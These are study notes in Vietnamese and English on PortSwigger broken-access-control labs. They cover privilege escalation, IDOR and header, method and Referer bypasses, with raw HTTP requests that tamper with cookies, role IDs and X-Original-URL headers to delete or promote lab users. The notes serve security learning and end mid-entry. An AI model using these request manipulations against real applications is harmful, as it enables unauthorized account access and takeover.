Port Swigger - Broken Access Control

Vertical Privilege Escalations

If a user can gain access to functionality that they are not permitted to access then this is vertical privilege escalation. For example, if a non-administrative user can gain access to an admin page where they can delete user accounts, then this is vertical privilege escalation.

Unprotected Functionality

Lỗi cơ bản nhất của Vertical Privilege Escalation:

At its most basic, vertical privilege escalation arises where an application does not enforce any protection for sensitive functionality.
 
For example, a website might host sensitive functionality at the following URL:
 
`https://insecure-website.com/admin`
 
This might be accessible by any user, not only administrative users who have a link to the functionality in their user interface. In some cases, the administrative URL might be disclosed in other locations, such as the `robots.txt` file:
 
`https://insecure-website.com/robots.txt`

URL có thể bị che giấu nhưng nó vẫn có thể bị lộ theo một cách nào đó:

Hiding sensitive functionality does not provide effective access control because users might discover the obfuscated URL in a number of ways.
 
Imagine an application that hosts administrative functions at the following URL:
 
`https://insecure-website.com/administrator-panel-yb556`
 
This might not be directly guessable by an attacker. However, the application might still leak the URL to users in JavaScript files.

Lab: Unprotected Admin Functionality

Nội dung của robots.txt:

User-agent: *
Disallow: /administrator-panel

Có thể truy cập /administrator-panel mà không cần xác thực. Xóa user carlos để hoàn thành lab.

Lab: Unprotected Admin Functionality with Unpredictable URL

Tìm thấy đoạn code sau trong trang /:

<script>
	var isAdmin = false;
	if (isAdmin) {
	   var topLinksTag = document.getElementsByClassName("top-links")[0];
	   var adminPanelTag = document.createElement('a');
	   adminPanelTag.setAttribute('href', '/admin-233j4q');
	   adminPanelTag.innerText = 'Admin panel';
	   topLinksTag.append(adminPanelTag);
	   var pTag = document.createElement('p');
	   pTag.innerText = '|';
	   topLinksTag.appendChild(pTag);
	}
</script>

Truy cập /admin-233j4q và xóa user carlos để hoàn thành lab.

Parameter-based Access Control Methods

Việc lưu quyền truy cập hoặc vai trò của người dùng ở trong một vị trí mà user có thể kiểm soát cũng có thể dẫn đến Vertical Privilege Escalation:

Some applications determine the user's access rights or role at login, and then store this information in a user-controllable location. This could be:
- A hidden field.
- A cookie.
- A preset query string parameter.
 
The application makes access control decisions based on the submitted value. For example:
 
`https://insecure-website.com/login/home.jsp?admin=true`
`https://insecure-website.com/login/home.jsp?role=1`

Lab: User Role Controlled by Request Parameter

Sau khi đăng nhập thì nhận được 2 cookies:

Cookie: session=wtJyCD9fUAG3vKHIsbydJIxfPxwj5hTH; Admin=false

Thay đổi Admin thành true và truy cập được trang /admin. Xóa user carlos để hoàn thành lab.

Lab: User Role Can Be Modified in User Profile

Request dùng để đổi email:

POST /my-account/change-email HTTP/2
Host: 0aee00310426f20982e54868006500e7.web-security-academy.net
Cookie: session=IBmVAIQVh90KpntYkLigYhUVXH8Bh5Kc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Origin: https://0aee00310426f20982e54868006500e7.web-security-academy.net
Referer: https://0aee00310426f20982e54868006500e7.web-security-academy.net/my-account
 
{
  "email" : "wiener@administrator.net"
}

Response body:

{
  "username" : "wiener",
  "email" : "wiener@administrator.net",
  "apikey" : "Z0I4U3cXcYuBI2eMVTbEzpFs51uDvGE9",
  "roleid" : 1
}

Thử thêm roleid request body:

{
  "email" : "wiener@administrator.net",
  "roleid" : 2
}

thì thấy rằng ta có thể thay đổi roleid của user hiện tại:

{
  "username" : "wiener",
  "email" : "wiener@administrator.net",
  "apikey" : "Z0I4U3cXcYuBI2eMVTbEzpFs51uDvGE9",
  "roleid" : 2
}

Truy cập /admin và xóa user carlos để hoàn thành lab.

Broken Access Control Resulting From Platform Misconfiguration

Ứng dụng có thể chặn user thuộc một role nào đó (chẳng hạn managers) truy cập vào resource cụ thể (POST /admin/deleteUser):

Some applications enforce access controls at the platform layer by restricting access to specific URLs and HTTP methods based on the user's role. For example, an application might configure a rule as follows:
 
`DENY: POST, /admin/deleteUser, managers`

Một số framework cho phép bypass bằng cách ghi đè URL cần truy cập thông qua các custom headers:

Some application frameworks support various non-standard HTTP headers that can be used to override the URL in the original request, such as `X-Original-URL` and `X-Rewrite-URL`. If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden via a request header, then it might be possible to bypass the access controls using a request like the following:
 
~~~http
POST / HTTP/1.1
X-Original-URL: /admin/deleteUser
...
~~~

Hoặc cũng có thể sử dụng method khác:

If an attacker can use the `GET` (or another) method to perform actions on a restricted URL, they can bypass the access control that is implemented at the platform layer.

Lab: URL-based Access Control Can Be Circumvented

Dùng request sau để truy cập trang /admin:

GET / HTTP/2
Host: 0a8000de044890718098997b002900ab.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: https://0a8000de044890718098997b002900ab.web-security-academy.net/
X-Original-Url: /admin

Dùng request sau để xóa user carlos:

GET /?username=carlos HTTP/2
Host: 0a8000de044890718098997b002900ab.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: https://0a8000de044890718098997b002900ab.web-security-academy.net/
X-Original-Url: /admin/delete

Lab: Method-based Access Control Can Be Circumvented

Request dùng để nâng quyền:

POST /admin-roles HTTP/2
Host: 0ab200f303fc2692807d492c00790045.web-security-academy.net
Cookie: session=E0Penp8hMvA8NdPy0YqFk0LFCLhFJLl2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0ab200f303fc2692807d492c00790045.web-security-academy.net
Referer: https://0ab200f303fc2692807d492c00790045.web-security-academy.net/admin
 
username=wiener&action=upgrade

Khi gửi request này với cookie của winer:peter thì nhận được response sau:

HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14
 
"Unauthorized"

Đổi method thành GET và chuyển body params thành query params:

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0ab200f303fc2692807d492c00790045.web-security-academy.net

Gửi request để hoàn thành lab.

Broken Access Control Resulting From URL-Matching Discrepancies

Một số ứng dụng rất khắt khe trong việc so khớp đường dẫn nhằm kiểm soát truy cập. Nếu ta có thể khiến cho thành phần kiểm soát truy cập không so khớp được thì có thể bypass được:

Websites can vary in how strictly they match the path of an incoming request to a defined endpoint. For example, they may tolerate inconsistent capitalization, so a request to `/ADMIN/DELETEUSER` may still be mapped to the `/admin/deleteUser` endpoint.
 
If the access control mechanism is less tolerant, it may treat these as two different endpoints and fail to enforce the correct restrictions as a result.

Ví dụ về Spring framework:

Similar discrepancies can arise if developers using the Spring framework have enabled the `useSuffixPatternMatch` option. This allows paths with an arbitrary file extension to be mapped to an equivalent endpoint with no file extension. In other words, a request to `/admin/deleteUser.anything` would still match the `/admin/deleteUser` pattern. Prior to Spring 5.3, this option is enabled by default.

Một ví dụ khác:

On other systems, you may encounter discrepancies in whether `/admin/deleteUser` and `/admin/deleteUser/` are treated as distinct endpoints. In this case, you may be able to bypass access controls by appending a trailing slash to the path.

Horizontal Privilege Escalation

Horizontal privilege escalation occurs if a user is able to gain access to resources belonging to another user, instead of their own resources of that type. For example, if an employee can access the records of other employees as well as their own, then this is horizontal privilege escalation.

Cách cơ bản nhất để khai thác Horizontal Privilege Escalation:

Horizontal privilege escalation attacks may use similar types of exploit methods to vertical privilege escalation. For example, a user might access their own account page using the following URL:
 
`https://insecure-website.com/myaccount?id=123`
 
If an attacker modifies the `id` parameter value to that of another user, they might gain access to another user's account page, and the associated data and functions.

Nếu ứng dụng sử dụng GUID để định danh người dùng thì cũng chưa chắc an toàn vì GUID có thể bị lộ ở đâu đó trong ứng dụng:

For example, instead of an incrementing number, an application might use globally unique identifiers (GUIDs) to identify users. This may prevent an attacker from guessing or predicting another user's identifier. However, the GUIDs belonging to other users might be disclosed elsewhere in the application where users are referenced, such as user messages or reviews.

Nếu ứng dụng từ chối request và redirect về trang đăng nhập nhưng response có chứa thông tin về người dùng thì vẫn được xem như là lỗ hổng về quyền truy cập:

In some cases, an application does detect when the user is not permitted to access the resource, and returns a redirect to the login page. However, the response containing the redirect might still include some sensitive data belonging to the targeted user, so the attack is still successful.

Lab: User ID Controlled by Request Parameter

Đăng nhập bằng tài khoản wiener:peter và gửi request đến /my-account?id=carlos để lấy API key.

Lab: User ID Controlled by Request Parameter, with Unpredictable User IDs

Khi xem trang /post?postId=3, tìm được đoạn code HTML có chứa GUID như sau:

<span id=blog-author><a href='/blogs?userId=8d8c3ecd-7c15-44fa-b240-9b725b06e82e'>carlos</a></span>

Đăng nhập và truy cập vào /blogs?userId=8d8c3ecd-7c15-44fa-b240-9b725b06e82e để lấy API key.

Lab: User ID Controlled by Request Parameter with Data Leakage in Redirect

Redirect response có đoạn code HTML chứa thông tin của người dùng:

<p>Your username is: carlos</p>
<div>
	Your API Key is: ukujEDz4tqCNdJiz5Ksa2MQkRnYHB0bE
</div>

Horizontal to Vertical Privilege Escalation

Horizontal privilege escalation có thể dẫn đến vertical privilege escalation nếu ta có thể kiểm soát một tài khoản có đặc quyền:

Often, a horizontal privilege escalation attack can be turned into a vertical privilege escalation, by compromising a more privileged user.
 
For example, a horizontal escalation might allow an attacker to reset or capture the password belonging to another user.

Lab: User ID Controlled by Request Parameter with Password Disclosure

Trang /my-account?id=wiener có chứa tài khoản của user wiener ở trong thẻ input như sau:

<input required type=password name=password value='peter'/>

Truy cập /my-account?id=administrator thì thấy có password như sau:

<input required type=password name=password value='lhmjvurse15j6hjous3b'/>

Đăng nhập bằng administrator:lhmjvurse15j6hjous3b và xóa user carlos để hoàn thành lab.

Insecure Direct Object References

Insecure direct object references (IDORs) are a subcategory of access control vulnerabilities. IDORs occur if an application uses user-supplied input to access objects directly and an attacker can modify the input to obtain unauthorized access.

Lab: Insecure Direct Object References

Khi sử dụng chức năng tải transcript thì thấy URL có dạng như sau:

https://0af1007403cd2f9a80f14054001a00ae.web-security-academy.net/download-transcript/3.txt

Và nó bắt đầu bằng 2.txt thay vì 1.txt.

Thử thay đổi 3 thành 1 thì nhận được response có chứa password như sau:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520
 
CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is 6hty1zfxme8v42y4dspe. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!

Đăng nhập bằng tài khoản carlos:6hty1zfxme8v42y4dspe để hoàn thành lab.

Access Control Vulnerabilities in Multi-step Processes

Nếu ứng dụng thiếu kiểm soát truy cập cho một bước trong nhiều bước của một chức năng gồm nhiều bước thì cũng có thể dẫn đến việc ứng dụng bị tấn công:

For example, the administrative function to update user details might involve the following steps:
1. Load the form that contains details for a specific user.
2. Submit the changes.
3. Review the changes and confirm.
 
Sometimes, a website will implement rigorous access controls over some of these steps, but ignore others. 
 
Imagine a website where access controls are correctly applied to the first and second steps, but not to the third step. An attacker can gain unauthorized access to the function by skipping the first two steps and directly submitting the request for the third step with the required parameters.

Lab: Multi-step Process with No Access Control on One Step

Request dùng để upgrade role:

POST /admin-roles HTTP/2
Host: 0a7900db03f9c0bb811252590030005b.web-security-academy.net
Cookie: session=KSKtZjhlBATCw56jmmGWpfAMnF31zNEL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net
Referer: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net/admin-roles
 
username=carlos&action=upgrade

Request dùng để xác nhận:

POST /admin-roles HTTP/2
Host: 0a7900db03f9c0bb811252590030005b.web-security-academy.net
Cookie: session=KSKtZjhlBATCw56jmmGWpfAMnF31zNEL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net
Referer: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net/admin
 
action=upgrade&confirmed=true&username=carlos

Sử dụng cookie của wiener:peter ở trong request xác nhận để tự upgrade quyền với các tham số như sau:

action=upgrade&confirmed=true&username=wiener

Referer-based Access Control

Một số ứng dụng kiểm soát truy cập dựa trên header Referer và cách làm này có thể bị bypass do attacker có thể chỉnh sửa bằng proxy:

Some websites base access controls on the `Referer` header submitted in the HTTP request. The `Referer` header can be added to requests by browsers to indicate which page initiated a request.
 
For example, an application robustly enforces access control over the main administrative page at `/admin`, but for sub-pages such as `/admin/deleteUser` only inspects the `Referer` header. If the `Referer` header contains the main `/admin` URL, then the request is allowed.

Lab: Referer-based Access Control

Trang /admin bị kiểm soát truy cập khi sử dụng tài khoản wiener:peter.